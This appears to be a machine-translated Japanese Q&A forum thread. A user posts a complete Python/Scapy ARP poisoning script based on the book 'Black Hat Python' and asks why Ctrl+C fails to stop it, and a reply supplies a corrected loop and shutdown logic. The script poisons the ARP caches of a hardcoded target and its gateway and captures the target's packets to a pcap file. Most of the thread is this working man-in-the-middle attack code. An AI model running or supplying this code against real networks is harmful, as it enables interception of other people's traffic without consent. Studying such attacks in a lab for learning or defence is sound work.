2016-10-28 10 views
0

blackhatのpythonブックに基づいて、私はarppoisoningプログラムを書こうとしました! それはうまく動作し、すべてのものgreate動作しますが、私はCtrlキーを押しながら+ cキーを押してプログラムを停止したい場合は、keybordinterrupt例外doesntの仕事! 私は復元対象を2回実行します。 "[*]復元対象"が2回表示されるためです!ここ は私の全体のコードです:ArpPoisoning with Python、BlackHat Book

from scapy.all import * 
import os 
import sys 
import threading 
import signal 


interface = raw_input("Enter Interface name :> ") 
target_ip = "192.168.43.180" 
gateway_ip = "192.168.43.1" 
packet_count = 10 

conf.iface = interface 
conf.verb = 0 

def restore_target(gateway_ip,gateway_mac,target_ip,target_mac): 
    print "[*] Restoring Target..." 
    send(ARP(op=2,psrc=gateway_ip,pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5) 
    send(ARP(op=2,psrc=target_ip,pdst=gateway_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5) 
    os.kill(os.getpid(),signal.SIGINT) 

def get_mac(ip_address): 
    responses , unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10) 
    for s,r in responses : 
     return r[Ether].src 
    return None 

def poison_target(gateway_ip,gateway_mac,target_ip,target_mac): 
    poison_target = ARP() 
    poison_target.op = 2 
    poison_target.psrc = gateway_ip 
    poison_target.pdst = target_ip 
    poison_target.hwdst = target_mac 

    poison_gateway = ARP() 
    poison_gateway.op = 2 
    poison_gateway.psrc = target_ip 
    poison_gateway.pdst = gateway_ip 
    poison_gateway.hwdst = gateway_mac 

    print "[*] Begining ARP Poisoning:" 
    while True: 
      send(poison_target) 
      send(poison_gateway) 
      time.sleep(2) 

    print ".:ARP poison Attack Finished:." 
    return 


print ".: Setting Up %s :." % interface 
gateway_mac = get_mac(gateway_ip) 

if gateway_mac is None: 
    print "Failed to Get Gateway MAC..." 
    sys.exit(0) 
else: 
    print "[*] Gateway %s is at %s" %(gateway_ip,gateway_mac) 
target_mac= get_mac(target_ip) 

if target_mac is None: 
    print "[!!!] Failed to get target MAC. Exiting." 
    sys.exit(0) 
else: 
    print "[*] Target %s is at %s" % (target_ip,target_mac) 

poison_thread = threading.Thread(target = poison_target,args=(gateway_ip,gateway_mac,target_ip,target_mac)) 
poison_thread.start() 

try: 
    print " \n[*] Start snifing for %d Packets \n" %packet_count 
    bpf_filter = "ip host %s" % target_ip 
    packets = sniff(count=packet_count,filter=bpf_filter,iface=interface) 
    wrpcap('arper.pcap',packets) 
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac) 
except KeyboardInterrupt: 
    restore_target(gateway_ip,gateway_mac,target_ip,target_mac) 
    sys.exit(0) 
+1

キーボード割り込みイベント? – dannyxn

+0

私のプログラムがrestoretargetメソッドに到達したら、それはos.kill(os.getpid()、signal.SIGINT)にerorを表示します。 –

答えて

1

[OK]を、私は同じ問題を抱えていました。

poison_target関数のwhile Trueループが問題です。このループは決して終了しません。

ダウンロード可能なコードを確認した後で、このコードのコードと若干の違いがあることがわかります。特に、著者は、グローバルおよびメインエラー処理でfinallypoisoningを使用しています。

def poison_target(gateway_ip, gateway_mac, target_ip, target_mac): 
    '''poison''' 
    global poisoning 
    --snip-- 
    print '[*] Begining the ARP poison. [CTRL-C to stop]' 
    while poisoning: 
     send(poison_t) 
     send(poison_g) 
     time.sleep(2) 
    print '[*] ARP poison attack finished.' 
    return 

そして、メインのコードに:あなたの代わりになって、CTRL +休憩を使用していないのはなぜ

--snip-- 
poisoning = True 
poison_thread.start() 
try: 
    --snip-- 
    packets = sniff(count=count, filter=bpf_filter, iface=interface) 
except KeyboardInterrupt: 
    pass 
finally: 
    --snip-- 
    poisoning = False 

    time.sleep(2) 

    restore_target(gateway_ip, gateway_mac, target_ip, target_mac) 
    --snip--